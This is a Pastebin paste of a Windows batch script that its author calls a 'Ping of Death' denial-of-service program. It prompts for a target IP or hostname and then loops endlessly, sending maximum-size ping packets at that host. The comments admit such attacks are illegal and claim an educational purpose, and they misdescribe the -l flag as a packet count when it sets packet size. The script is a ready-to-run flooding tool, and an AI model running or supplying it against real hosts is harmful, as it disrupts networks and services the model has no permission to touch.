Advertisement
M1cr0s

POD Program - Made by M1cr0s

Oct 25th, 2019
87
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 1.00 KB | None | 0 0
  1. :: This program is known as the "Ping of Death" also known as a Denial of Service attack (DOS attack)
  2. :: Note that this program will not do any major harm to any major sites, but DOS'ing of any kind is illegal, however for educational purposes
  3. :: using it on CMD is a great way to understand what it does. Cancel the program with "CTRL+C".
  4. :: As opposed to just pinging the target, setting the "l" (amount of packets) to 65500 means that you are pinging the target with as many packets
  5. :: that are available each time you hit, create a simple loop and you have a fairly powerful lower end DOS program.
  6.  
  7. @echo off
  8. color a
  9. title Basic DOS Program - Made by M1cr0s
  10. :start
  11. cls
  12. echo [ - Basic DOS Program - Made by M1cr0s - ]
  13. echo.
  14. set /p host="[+] Enter the IP/DNS you want you DOS: "
  15. set /p check="[+] Are you sure you want to hit %host%? [y/n]: "
  16.  
  17. if %check% == y goto ping
  18. if %check% == n goto start
  19.  
  20.  
  21. :ping
  22. color c
  23. cls
  24. echo [ - PINGING: %host% - ]
  25. echo.
  26. :loop
  27. ping %host% -l 65500 -w 1 -n 1
  28. goto loop
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement